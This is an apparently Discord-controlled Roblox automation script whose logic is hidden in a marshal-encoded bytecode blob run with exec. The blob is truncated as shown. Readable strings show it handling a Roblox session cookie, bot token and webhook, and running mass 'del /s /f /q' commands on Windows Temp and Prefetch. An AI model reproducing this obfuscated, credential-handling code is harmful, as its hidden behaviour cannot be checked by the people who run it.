import marshal
import asyncio
import random
import subprocess
import sys
import webbrowser
import nextcord
from nextcord.ext import commands
import undetected_chromedriver as uc
import aiohttp
from psutil import process_iter
import requests
import json
from os import listdir
from os.path import isfile, join
import datetime
from datetime import date
from datetime import datetime
import threading
import shutil
import pyautogui as pg
import time
import os
import wget
import psutil
import win32gui
import win32con
import zipfile
from selenium import webdriver
exec(marshal.loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00@\x00\x00\x00s\xac\x04\x00\x00d\x00d\x01l\x00Z\x00d\x00d\x01l\x01Z\x01d\x00d\x01l\x02Z\x02d\x00d\x01l\x03Z\x03d\x00d\x01l\x04Z\x04d\x00d\x01l\x05Z\x05d\x00d\x02l\x06m\x07Z\x07\x01\x00d\x00d\x01l\x08Z\td\x00d\x01l\nZ\nd\x00d\x03l\x0bm\x0cZ\x0c\x01\x00d\x00d\x01l\rZ\rd\x00d\x01l\x0eZ\x0ed\x00d\x04l\x0fm\x10Z\x10\x01\x00d\x00d\x05l\x11m\x12Z\x12m\x13Z\x13\x01\x00d\x00d\x01l\x14Z\x14d\x00d\x06l\x14m\x15Z\x15\x01\x00d\x00d\x07l\x14m\x14Z\x14\x01\x00d\x00d\x01l\x16Z\x16d\x00d\x01l\x17Z\x17d\x00d\x01l\x18Z\x19d\x00d\x01l\x1aZ\x1ad\x00d\x01l\x0fZ\x0fd\x00d\x01l\x1bZ\x1bd\x00d\x01l\x0bZ\x0bd\x00d\x01l\x1cZ\x1cd\x00d\x01l\x1dZ\x1dd\x00d\x01l\x1eZ\x1ed\x00d\x08l\x1fm Z \x01\x00zhe\x0e\xa0!e"d\td\nd\x0bd\x0c\x8d\x03\xa1\x01Z#e#d\r\x19\x00Z$e#d\x0e\x19\x00Z%z\x06e#d\x0f\x19\x00Z&W\x00n\x0e\x01\x00\x01\x00\x01\x00e\'d\x10\x83\x01\x01\x00e(\x83\x00\x01\x00e)\x83\x00\x01\x00Y\x00z\x1ae#d\x11\x19\x00Z*g\x00d\x12\xa2\x01Z+e#d\x11\x19\x00e+v\x00r\xc1e\'d\x13\x83\x01\x01\x00e(\x83\x00\x01\x00e)\x83\x00\x01\x00W\x00n\x0e\x01\x00\x01\x00\x01\x00e\'d\x14\x83\x01\x01\x00e(\x83\x00\x01\x00e)\x83\x00\x01\x00Y\x00z\x0fe#d\x15\x19\x00Z,e,d\x16k\x02r\xddd\x17Z-n\x02d\x18Z-W\x00n\x06\x01\x00\x01\x00\x01\x00d\x17Z-Y\x00W\x00n\x0e\x01\x00\x01\x00\x01\x00e\'d\x19\x83\x01\x01\x00e(\x83\x00\x01\x00e)\x83\x00\x01\x00Y\x00zZg\x00a.d\x18a/e\x03j0d\x00\x19\x00Z1d\x1aa2e\x0f\xa03d\x1b\xa1\x01Z4e\x07j5d\x01d\x1c\x8d\x01Z6e\x05j7d\x1dd\x1e\x8d\x01Z8e\x05j9j:d\x1fe\x05j;j<d \x8d\x02Z=e\x05j9j:d!e\x05j;j<d \x8d\x02Z>e\x05j9j:d"e\x05j;j<d \x8d\x02Z?e\x05j9j:d#e\x05j;j<d \x8d\x02Z@e\x05j9j:d$e\x05j;j<d \x8d\x02ZAe\x05j9j:d%e\x05j;jBd \x8d\x02ZCW\x00n\x0e\x01\x00\x01\x00\x01\x00e\'d&\x83\x01\x01\x00e(\x83\x00\x01\x00e)\x83\x00\x01\x00Y\x00d\'d(\x84\x00ZDeDd\x17\x83\x01\x01\x00d)d*\x84\x00ZEd+d,\x84\x00ZFd-d.\x84\x00ZGd/d0\x84\x00ZHd1d2\x84\x00ZId3d4\x84\x00ZJd5d6\x84\x00ZKd7d8\x84\x00ZLd9d:\x84\x00ZMd;d<\x84\x00ZNd=d>\x84\x00ZOd?d@\x84\x00ZPdAdB\x84\x00ZQdCdD\x84\x00ZRdEdF\x84\x00ZSG\x00dGdH\x84\x00dHe\x05j9jT\x83\x03ZUG\x00dIdJ\x84\x00dJe\x05j9jT\x83\x03ZVG\x00dKdL\x84\x00dLe\x05j9jT\x83\x03ZWG\x00dMdN\x84\x00dNe\x05j9jT\x83\x03ZXG\x00dOdP\x84\x00dPe\x05j9jY\x83\x03ZZG\x00dQdR\x84\x00dRe\x05j9jY\x83\x03Z[G\x00dSdT\x84\x00dTe\x05j9jY\x83\x03Z\\G\x00dUdV\x84\x00dVe\x05j9jY\x83\x03Z]G\x00dWdX\x84\x00dXe\x05j9jY\x83\x03Z^G\x00dYdZ\x84\x00dZe\x05j9jY\x83\x03Z_G\x00d[d\\\x84\x00d\\e\x05j9jY\x83\x03Z`e6jad]d^\x84\x00\x83\x01Zbt/\x90\x02rTz%t/\x90\x02r@z\x07e6\xa0ce%\xa1\x01\x01\x00W\x00n\x0e\x01\x00\x01\x00\x01\x00e\'d_\x83\x01\x01\x00e(\x83\x00\x01\x00e)\x83\x00\x01\x00Y\x00z\x05eG\x83\x00\x01\x00W\x00n\x04\x01\x00\x01\x00\x01\x00Y\x00W\x00n\r\x01\x00\x01\x00\x01\x00e\'d`\x83\x01\x01\x00e\x1a\xa0dda\xa1\x01\x01\x00Y\x00t/\x90\x02s\x1cd\x01S\x00d\x01S\x00)b\xe9\x00\x00\x00\x00N)\x01\xda\x08commands)\x01\xda\x0cprocess_iter)\x01\xda\x07listdir\xa9\x02\xda\x06isfile\xda\x04join)\x01\xda\x04date)\x01\xda\x08datetime)\x01\xda\twebdriverz\x0bconfig.json\xda\x01r\xda\x04utf8)\x01\xda\x08encodingZ\x0bwebhook_urlZ\tBot_TokenZ\rRoblox_Cookiez\x1aConfig Error Roblox CookieZ\nChannel_Id)\x12l\x04\x00\x00\x00z\x00\x08}\xd8x\x85nl\x04\x00\x00\x00\x0b@\x88b>>\xc2tl\x04\x00\x00\x00\x1e\x10\x88|\xe3W\xfatl\x04\x00\x00\x00d \x88\\f|\x01ul\x04\x00\x00\x00\x8f\x10\x08\x12\x831\xadwl\x04\x00\x00\x00ZP\x08U\xe76\xc0yl\x04\x00\x00\x00\x14\x00\x85"\xd5\x16\xbcil\x04\x00\x00\x00\x1e0\x84\x19u\x01\xe7hl\x04\x00\x00\x00y\x10\x08t\xcf0\xb7yl\x04\x00\x00\x00\n \x044\xe4\\\xe6hl\x04\x00\x00\x002 \x08c\xee\x17\xc4yl\x04\x00\x00\x00\x00\x00\x88z*>\x1cvl\x04\x00\x00\x00F \x08S/\x11Dwl\x04\x00\x00\x00=@\x88JA\x1c\x8fsl\x04\x00\x00\x00\x06 \x84lxi\xe6hl\x04\x00\x00\x00\x0b \x044\xe4\\\xe6hl\x04\x00\x00\x00\x14@\x88&^}\xc0pl\x04\x00\x00\x00\n@\x88\x15\xcas\xcbsz!Config Error Back List Channel Idz\x17Config Error Channel IdZ\x08Syx_Part\xda\x00FTz\x0cconfig error\xe9d\x00\x00\x00\xda\x07APPDATA)\x01Z\x0chelp_commanduH\x00\x00\x00\xe0\xb9\x80\xe0\xb8\x9b\xe0\xb8\xb4\xe0\xb8\x94-\xe0\xb8\x9b\xe0\xb8\xb4\xe0\xb8\x94 \xe0\xb8\x81\xe0\xb8\xb2\xe0\xb8\xa3 \xe0\xb9\x80\xe0\xb8\x9b\xe0\xb8\xb4\xe0\xb8\x94-\xe0\xb8\x9b\xe0\xb8\xb4\xe0\xb8\x94 \xe0\xb9\x80\xe0\xb8\x81\xe0\xb8\xa1 Roblox\xa9\x01\xda\x05titleu$\x00\x00\x00\xe0\xb9\x80\xe0\xb8\x9b\xe0\xb8\xb4\xe0\xb8\x94\xe0\xb9\x80\xe0\xb8\x82\xe0\xb9\x89\xe0\xb8\xb2 Blox Fruits)\x02\xda\x05label\xda\x05styleu\x1a\x00\x00\x00\xe0\xb9\x80\xe0\xb8\x9b\xe0\xb8\xb4\xe0\xb8\x94 Roblox Playeru\x17\x00\x00\x00\xe0\xb9\x80\xe0\xb8\x9b\xe0\xb8\xb4\xe0\xb8\x94 web Robloxu0\x00\x00\x00\xe0\xb9\x80\xe0\xb8\x82\xe0\xb9\x89\xe0\xb8\xb2-\xe0\xb8\xad\xe0\xb8\xad\xe0\xb8\x81 \xe0\xb8\x97\xe0\xb8\xb8\xe0\xb8\x81 20 \xe0\xb8\x99\xe0\xb8\xb2\xe0\xb8\x97\xe0\xb8\xb5u\x0c\x00\x00\x00\xe0\xb9\x80\xe0\xb8\x9b\xe0\xb8\xb4\xe0\xb8\x94u\t\x00\x00\x00\xe0\xb8\x9b\xe0\xb8\xb4\xe0\xb8\x94z\x14Error global, Buttonc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00sX\x00\x00\x00d\x01d\x00l\x00}\x01|\x01\xa0\x01d\x02\xa1\x01}\x02|\x01\xa0\x01d\x03\xa1\x01}\x03|\x02\xa0\x02\xa1\x00}\x04|\x00d\x04k\x02r\x1e|\x03\xa0\x03|\x04d\x05\xa1\x02\x01\x00d\x00S\x00|\x00d\x06k\x02r*|\x03\xa0\x03|\x04d\x01\xa1\x02\x01\x00d\x00S\x00d\x00S\x00)\x07Nr\x01\x00\x00\x00\xda\x08kernel32\xda\x06user32T\xe9\x01\x00\x00\x00F)\x04\xda\x06ctypesZ\x06WinDLLZ\x10GetConsoleWindowZ\nShowWindow)\x05Z\x02urr\x18\x00\x00\x00r\x15\x00\x00\x00r\x16\x00\x00\x00Z\x04hWnd\xa9\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x06cmdsetN\x00\x00\x00s\x12\x00\x00\x00\x08\x01\n\x01\n\x01\x08\x01\x08\x01\x10\x01\x08\x01\x10\x01\x04\xffr\x1a\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\t\x00\x00\x00\xc3\x00\x00\x00s\xa2\x00\x00\x00\x81\x01z4t\x00\xa0\x01\xa1\x004\x00I\x00d\x00H\x00\x9a\x1e}\x01t\x02j\x03j\x04t\x05|\x01d\x01\x8d\x02}\x02|\x02j\x06|\x00d\x02\x8d\x01I\x00d\x00H\x00\x01\x00W\x00d\x00\x04\x00\x04\x00\x83\x03I\x00d\x00H\x00\x01\x00W\x00d\x00S\x001\x00I\x00d\x00H\x00s.w\x01\x01\x00\x01\x00\x01\x00Y\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00t\x07d\x03\x83\x01\x01\x00t\x08d\x04\x83\x01D\x00]\x06}\x03t\td\x05\x83\x01\x01\x00qAt\n\x83\x00\x01\x00t\x0b\x83\x00\x01\x00Y\x00d\x00S\x00)\x06N)\x01\xda\x07session\xa9\x01\xda\x05embedTr\x0f\x00\x00\x00z\x0eWeb Hook Error)\x0c\xda\x07aiohttpZ\rClientSession\xda\x08nextcordZ\x07WebhookZ\x08from_url\xda\nwebhookurl\xda\x04sendr\x1a\x00\x00\x00\xda\x05range\xda\x05print\xda\x05input\xda\x04quit)\x04r\x1d\x00\x00\x00r\x1b\x00\x00\x00Z\x07webhookZ\x02ppr\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x07logsendX\x00\x00\x00s\x18\x00\x00\x00\x02\x80\x02\x01\x12\x01\x10\x01\x14\x012\xfe\x06\x03\x08\x01\x0c\x01\n\x01\x06\x01\x0c\x01r&\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x03\x00\x00\x00sR\x00\x00\x00d\x01}\x01t\x00\x83\x00D\x00]\x11\x89\x00t\x01\x87\x00f\x01d\x02d\x03\x84\x08|\x00D\x00\x83\x01\x83\x01r\x16|\x01d\x047\x00}\x01q\x05|\x01d\x04k\x05r\x1ft\x02j\x03j\x04S\x00|\x01d\x04k\x01r\'t\x02j\x03j\x05S\x00d\x00S\x00)\x05Nr\x01\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x003\x00\x00\x00s\x1c\x00\x00\x00\x81\x00|\x00]\t}\x01|\x01\x88\x00\xa0\x00\xa1\x00v\x00V\x00\x01\x00q\x02d\x00S\x00)\x01N)\x01\xda\x04name)\x02\xda\x02.0Z\x07procstr\xa9\x01Z\x07processr\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\t<genexpr>f\x00\x00\x00s\x04\x00\x00\x00\x02\x80\x1a\x00z\x1bcappopen.<locals>.<genexpr>r\x17\x00\x00\x00)\x06r\x03\x00\x00\x00\xda\x03anyr\x1f\x00\x00\x00\xda\x0bButtonStyle\xda\x05green\xda\x03red)\x02Z\x07appname\xda\x01pr\x19\x00\x00\x00r)\x00\x00\x00r\x0e\x00\x00\x00\xda\x08cappopenc\x00\x00\x00s\x0e\x00\x00\x00\x04\x01\n\x01\x16\x01\x08\x01\x02\x80\x10\x01\x14\x01r0\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00sb\x00\x00\x00t\x00r-t\x01\x9b\x00d\x01\x9d\x02\x89\x00\x87\x00f\x01d\x02d\x03\x84\x08t\x02\xa0\x03\x88\x00\xa1\x01D\x00\x83\x01}\x00|\x00D\x00]\x19}\x01d\x04|\x01v\x00s\x1fd\x05|\x01v\x00r"\x01\x00d\x00S\x00|\x01\xa0\x04d\x06\xa1\x01r,t\x05\xa0\x06|\x01\xa1\x01\x01\x00q\x15d\x00S\x00d\x00S\x00)\x07N\xfa\x04/binc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x08\x00\x00\x00\x13\x00\x00\x00s&\x00\x00\x00g\x00|\x00]\x0f}\x01t\x00j\x01\xa0\x02t\x00j\x01\xa0\x03\x88\x00|\x01\xa1\x02\xa1\x01r\x02|\x01\x91\x02q\x02S\x00r\x19\x00\x00\x00)\x04\xda\x02os\xda\x04pathr\x06\x00\x00\x00r\x07\x00\x00\x00\xa9\x02r(\x00\x00\x00\xda\x01f\xa9\x01Z\x06mypathr\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\n<listcomp>n\x00\x00\x00s\x02\x00\x00\x00&\x00z\x1egetnamesyx.<locals>.<listcomp>\xfa\x1eCefSharp.BrowserSubprocess.exe\xfa\x0elua-decomp.exez\x04.exe)\x07\xda\x06syxrun\xda\x03syxr2\x00\x00\x00r\x04\x00\x00\x00\xda\x08endswith\xda\x02ee\xda\x06append)\x02\xda\tonlyfiles\xda\x02oor\x19\x00\x00\x00r6\x00\x00\x00r\x0e\x00\x00\x00\xda\ngetnamesyxj\x00\x00\x00s\x12\x00\x00\x00\x04\x01\n\x02\x18\x01\x08\x01\x16\x01\x14\x01\x02\x80\x04\xfa\x04\x04rA\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s>\x00\x00\x00d\x01d\x02\x84\x00}\x00d\x03}\x01t\x00\xa0\x01d\x00|\x01\xa1\x02}\x02|\x02d\x04k\x03r\x1cd\x05}\x03d\x05}\x04|\x00|\x02|\x03|\x04\x83\x03\x01\x00d\x00S\x00\t\x00d\x00S\x00)\x06Nc\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\t\x00\x00\x00S\x00\x00\x00s\x1e\x00\x00\x00t\x00\xa0\x01|\x00t\x02j\x03d\x01d\x01|\x01|\x02t\x02j\x04\xa1\x07\x01\x00d\x00S\x00)\x02Nr\x01\x00\x00\x00)\x05\xda\x08win32guiZ\x0cSetWindowPos\xda\x08win32conZ\x08HWND_TOPZ\x0eSWP_SHOWWINDOW)\x03\xda\x04hwnd\xda\x05width\xda\x06heightr\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x0fset_window_sizes\x00\x00\x00\xf3\x02\x00\x00\x00\x1e\x00z"robloxset.<locals>.set_window_size\xda\x06Robloxr\x01\x00\x00\x00\xe9\n\x00\x00\x00)\x02rB\x00\x00\x00Z\nFindWindow)\x05rG\x00\x00\x00Z\x0cwindow_titlerD\x00\x00\x00rE\x00\x00\x00rF\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\trobloxsetr\x00\x00\x00s\x08\x00\x00\x00\x08\x01\x10\x01 \x01\x06\x01rK\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x0b\x00\x00\x00C\x00\x00\x00s\x82\x00\x00\x00z:t\x00\xa0\x01\xa1\x00}\x01|\x00|\x01j\x02d\x01<\x00|\x01j\x03d\x02d\x03|\x01j\x03d\x02d\x04\x8d\x01j\x04d\x05\x19\x00d\x06\x9c\x02d\x07\x8d\x02j\x04d\x08\x19\x00}\x01d\t}\x02t\x05\xa0\x06d\nd\x0b\xa1\x02}\x03t\x07\xa0\x08d\x0c|\x01\x9b\x00d\r|\x03\x9b\x00d\x0e|\x02\x9b\x00d\x0f|\x03\x9b\x00d\x10\x9d\t\xa1\x01\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00Y\x00d\x00S\x00)\x11N\xfa\x0e.ROBLOSECURITYz1https://auth.roblox.com/v1/authentication-ticket/z\x17https://www.roblox.com/\xa9\x01\xda\x03url\xfa\x0cX-CSRF-Token)\x02Z\x07RefererrO\x00\x00\x00)\x02rN\x00\x00\x00\xda\x07headersz\x19RBX-Authentication-Ticketl\x03\x00\x00\x00\x9djJH\x02\x00i\x80\x96\x98\x00i\xff\xe0\xf5\x05z)roblox-player:1+launchmode:play+gameinfo:z\x8b+launchtime:1+placelauncherurl:https%3A%2F%2Fassetgame.roblox.com%2Fgame%2FPlaceLauncher.ashx%3Frequest%3DRequestGame%26browserTrackerId%3Dz\r%26placeId%3Dz/%26isPlayTogetherGame%3Dfalse+browsertrackerid:z$+robloxLocale:en_us+gameLocale:en_us)\t\xda\x08requestsr\x1b\x00\x00\x00Z\x07cookies\xda\x04postrP\x00\x00\x00\xda\x06randomZ\x07randint\xda\nwebbrowser\xda\x04open)\x04\xda\tRawCookieZ\x0bGamesessionZ\x07PlaceIdZ\tBrowserIDr\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x08joingamew\x00\x00\x00s\x10\x00\x00\x00\x02\x01\x08\x01\n\x01(\x01\x04\x01\x0c\x01*\x01\x0c\x01rW\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s\\\x00\x00\x00|\x00r,t\x00r$t\x01|\x00d\x01\x83\x02\\\x02}\x01}\x02d\x02\xa0\x02|\x01|\x02\xa1\x02}\x03t\x03d\x03|\x03\x9b\x00\x9d\x02d\x04d\x05\x8d\x02\x01\x00t\x04\xa0\x05d\x06\xa1\x01\x01\x00|\x00d\x068\x00}\x00n\x04|\x00|\x008\x00}\x00|\x00s\x02d\x00S\x00d\x00S\x00)\x07N\xe9<\x00\x00\x00z\r{:02d}:{:02d}z\x0bRe LogIn : \xfa\x01\r)\x01\xda\x03endr\x17\x00\x00\x00)\x06\xda\x05ggggg\xda\x06divmod\xda\x06formatr#\x00\x00\x00\xda\x04time\xda\x05sleep)\x04\xda\x01tZ\x04minsZ\x04secsZ\x05timerr\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\tcountdown\x80\x00\x00\x00s\x12\x00\x00\x00\x04\x02\x04\x01\x0e\x01\x0c\x01\x12\x01\n\x01\n\x01\x08\x02\x0c\xf8ra\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sX\x00\x00\x00t\x00r*t\x01d\x01\x83\x01d\x02k\x02r t\x02\xa0\x03\xa1\x00}\x00t\x02\xa0\x04d\x03\xa1\x01}\x01t\x05|\x01\x83\x01\x01\x00t\x02\xa0\x06|\x01\xa1\x01\x01\x00t\x02\xa0\x07|\x00\xa1\x01\x01\x00n\x01\t\x00t\x08\xa0\td\x04\xa1\x01\x01\x00t\x00s\x02d\x00S\x00d\x00S\x00)\x05N\xda\x012\xda\x02okz\x0b./lib/2.png\xe9\x02\x00\x00\x00)\n\xda\x05ggfdf\xda\x08chackimg\xda\x02pg\xda\x08position\xda\x14locateCenterOnScreenr#\x00\x00\x00Z\x05click\xda\x06moveTor^\x00\x00\x00r_\x00\x00\x00)\x02\xda\x05eeeeeZ\x02e6r\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x08youtube1\x8b\x00\x00\x00s\x14\x00\x00\x00\x04\x02\x0c\x01\x08\x01\n\x01\x08\x01\n\x01\x0c\x01\x02\x01\n\x01\x0c\xf8rl\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x0c\x00\x00\x00C\x00\x00\x00sr\x01\x00\x00d\x01}\x00d\x02}\x01d\x03t\x00\xa0\x01\xa1\x00\x17\x00d\x04\x17\x00d\x05g\x02}\x02d\x06}\x03d\x06}\x04d\x06}\x05t\x02|\x00\x83\x01\x01\x00t\x00\xa0\x03d\x07\xa1\x01\x01\x00t\x00\xa0\x03d\x08\xa1\x01\x01\x00|\x02D\x00]w}\x06t\x00\xa0\x04|\x06\xa1\x01D\x00]o}\x07t\x00j\x05\xa0\x06|\x06|\x07\xa1\x02}\x08|\x08\xa0\x07d\t\xa1\x01}\t|\x08|\td\n\x17\x00d\x00\x85\x02\x19\x00}\nz:t\x00j\x05\xa0\x08|\x08\xa1\x01r[t\x00\xa0\t|\x08\xa1\x01\x01\x00t\x02|\x00\x9b\x00d\x0b|\n\x9b\x00\x9d\x03\x83\x01\x01\x00|\x03d\n\x17\x00}\x03n\x1ft\x00j\x05\xa0\n|\x08\xa1\x01rz|\x08\xa0\x0bd\x0c\xa1\x01rhW\x00q+t\x0c\xa0\r|\x08\xa1\x01\x01\x00t\x02|\x00\x9b\x00d\r|\n\x9b\x00\x9d\x03\x83\x01\x01\x00|\x04d\n\x17\x00}\x04W\x00q+\x04\x00t\x0ey\x9a\x01\x00}\x0b\x01\x00z\x13t\x02|\x01\x9b\x00d\x0e|\n\x9b\x00\x9d\x03\x83\x01\x01\x00|\x05d\n7\x00}\x05W\x00Y\x00d\x00}\x0b~\x0bq+d\x00}\x0b~\x0bw\x01w\x00q$t\x02d\x0ft\x0f|\x03\x83\x01\x17\x00d\x10\x17\x00t\x0f|\x04\x83\x01\x17\x00d\x11\x17\x00\x83\x01\x01\x00t\x02d\x12|\x05\x9b\x00d\x13\x9d\x03\x83\x01\x01\x00t\x02\x83\x00\x01\x00d\x00S\x00)\x14Nz\x05\x1b[32mz\x05\x1b[31mz\tC:/Users/z\x13/AppData/Local/Tempz\x0fC:/Windows/Tempr\x01\x00\x00\x00z\x1fdel /s /f /q c:\\windows\temp\\*.*z del /s /f /q c:\\WINDOWS\\Prefetch\xfa\x01\\r\x17\x00\x00\x00z\x16Success: deleted file Z\nchocolateyz\x18Success: deleted folder z\x06Fail: z\x08deleted z\x0b files and z\t folders.z\x05Fail \xda\x01.)\x10r2\x00\x00\x00\xda\x08getloginr#\x00\x00\x00\xda\x06systemr\x04\x00\x00\x00r3\x00\x00\x00r\x07\x00\x00\x00\xda\x04findr\x06\x00\x00\x00\xda\x06unlink\xda\x05isdir\xda\x0c__contains__\xda\x06shutilZ\x06rmtree\xda\tException\xda\x03str)\x0cZ\x05GreenZ\x03RedZ\x04fereZ\x0fdeleteFileCountZ\x11deleteFolderCountZ\x05faileZ\x06folderZ\x08the_fileZ\tfile_pathZ\x07indexNoZ\x08itemName\xda\x01er\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x07clstemp\x96\x00\x00\x00sD\x00\x00\x00\x04\x01\x04\x01\x14\x02\x04\x01\x04\x01\x04\x01\x08\x01\n\x01\n\x01\x08\x01\x0e\x01\x0e\x01\n\x01\x10\x01\x02\x01\x0c\x01\n\x01\x12\x01\n\x01\x0c\x01\x0e\x01\n\x01\x12\x01\x08\x01\x04\x80\x0e\x01\x12\x01\x14\x01\x08\x80\x02\xfe\x02\xf2 \x11\x10\x01\n\x01ry\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00sF\x00\x00\x00t\x00\xa0\x01\xa1\x00}\x01t\x00\xa0\x02d\x01|\x00\x9b\x00d\x02\x9d\x03\xa1\x01}\x02t\x00\xa0\x03|\x02\xa1\x01\x01\x00t\x00\xa0\x01\xa1\x00}\x03|\x03|\x02k\x02r!t\x00\xa0\x03|\x01\xa1\x01\x01\x00d\x03S\x00d\x04S\x00)\x05Nz\x06./lib/z\x04.pngrc\x00\x00\x00\xda\x03err)\x04rg\x00\x00\x00rh\x00\x00\x00ri\x00\x00\x00rj\x00\x00\x00)\x04Z\x03imgrk\x00\x00\x00Z\x05wandbZ\x04eeeer\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00rf\x00\x00\x00\xb6\x00\x00\x00s\x10\x00\x00\x00\x08\x01\x12\x01\n\x01\x08\x01\x08\x01\n\x01\x04\x01\x04\x02rf\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x08\x00\x00\x00C\x00\x00\x00s\x94\x00\x00\x00t\x00j\x01\xa0\x02d\x01\xa1\x01}\x00z9t\x03|\x00d\x02\x83\x02\x8f)}\x01t\x04\xa0\x05|\x01\xa1\x01}\x02t\x00j\x01\xa0\x06|\x02d\x03\x19\x00\xa1\x01}\x03t\x00\xa0\x07|\x03t\x00j\x08\xa1\x02s+\t\x00W\x00d\x00\x04\x00\x04\x00\x83\x03\x01\x00W\x00d\x00S\x00|\x03W\x00\x02\x00d\x00\x04\x00\x04\x00\x83\x03\x01\x00W\x00S\x001\x00s8w\x01\x01\x00\x01\x00\x01\x00Y\x00\x01\x00W\x00d\x00S\x00\x04\x00t\tyI\x01\x00\x01\x00\x01\x00Y\x00d\x00S\x00w\x00)\x04Nz0%PROGRAMDATA%\\Riot Games\\RiotClientInstalls.jsonr\x0b\x00\x00\x00Z\nrc_default)\nr2\x00\x00\x00r3\x00\x00\x00\xda\nexpandvarsrU\x00\x00\x00\xda\x04json\xda\x04load\xda\x07abspath\xda\x06access\xda\x04X_OK\xda\x11FileNotFoundError)\x04Z\x12riot_installs_path\xda\x04fileZ\x0fclient_installsZ\x08rcs_pathr\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\x0cget_rcs_path\xc0\x00\x00\x00s\x1a\x00\x00\x00\x0c\x01\x02\x01\x0c\x01\n\x01\x10\x01\x0e\x01\x02\x01\x12\xfc\x02\x05(\xfb\x0c\x06\x06\x01\x02\xffr\x83\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x0e\x00\x00\x00C\x00\x00\x00s\xb8\x00\x00\x00z\x0bt\x00j\x01d\x01d\x02\x8d\x01\x04\x00}\x00}\x00W\x00|\x00S\x00\x01\x00\x01\x00\x01\x00z\nt\x02j\x01d\x03d\x04\x8d\x01}\x00W\x00Y\x00|\x00S\x00\x01\x00\x01\x00\x01\x00d\x05}\x01t\x03\xa0\x04|\x01\xa1\x01}\x02|\x02j\x05}\x03d\x06|\x03\x17\x00d\x07\x17\x00}\x04t\x06\xa0\x07|\x04d\x08\xa1\x02}\x05t\x08\xa0\t|\x05d\t\xa1\x02\x8f\x0c}\x06|\x06\xa0\n\xa1\x00\x01\x00W\x00d\x00\x04\x00\x04\x00\x83\x03\x01\x00n\x081\x00sHw\x01\x01\x00\x01\x00\x01\x00Y\x00\x01\x00t\x0b\xa0\x0c|\x05\xa1\x01\x01\x00t\x02j\x01d\x03d\x04\x8d\x01}\x00Y\x00Y\x00|\x00S\x00)\nNT)\x01Z\x0euse_subprocessz\x10chromedriver.exe)\x01Z\x0fexecutable_pathz:https://chromedriver.storage.googleapis.com/LATEST_RELEASEz,https://chromedriver.storage.googleapis.com/z\x17/chromedriver_win32.zipz\x10chromedriver.zipr\x0b\x00\x00\x00)\r\xda\x02ucZ\x06Chromer\n\x00\x00\x00rQ\x00\x00\x00\xda\x03get\xda\x04text\xda\x04wgetZ\x08download\xda\x07zipfileZ\x07ZipFileZ\nextractallr2\x00\x00\x00\xda\x06remove)\x07\xda\x06driverrN\x00\x00\x00\xda\x08responseZ\x0eversion_numberZ\x0cdownload_urlZ\x11latest_driver_zipZ\x07zip_refr\x19\x00\x00\x00r\x19\x00\x00\x00r\x0e\x00\x00\x00\xda\nopenroblox\xcb\x00\x00\x00s"\x00\x00\x00\x02\x01\x12\x01\x04\r\x06\xf4\x02\x01\x10\x01\x04\n\x06\xf7\x04\x01\n\x01\x06\x01\x0c\x01\x0c\x014\x01\n\x01\x10\x01\x04\x01r\x8c\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00\x00\x00C\x00\x00\x00s`\x00\x00\x00t\x00\x83\x00a\x01t\x01\xa0\x02d\x01\xa1\x01\x01\x00t\x01\xa0\x03\xa1\x00\x01\x00z\x0ft\x01\xa0\x04d\x02d\x03d\x04d\x05d\x06d\x04t\x05d\x07\x9c\x07\xa1\x01\x01\x00W\x00n\x08\x01\x00\x01\x00\x01\x00t\x06d\x08\x83\x01\x01\x00Y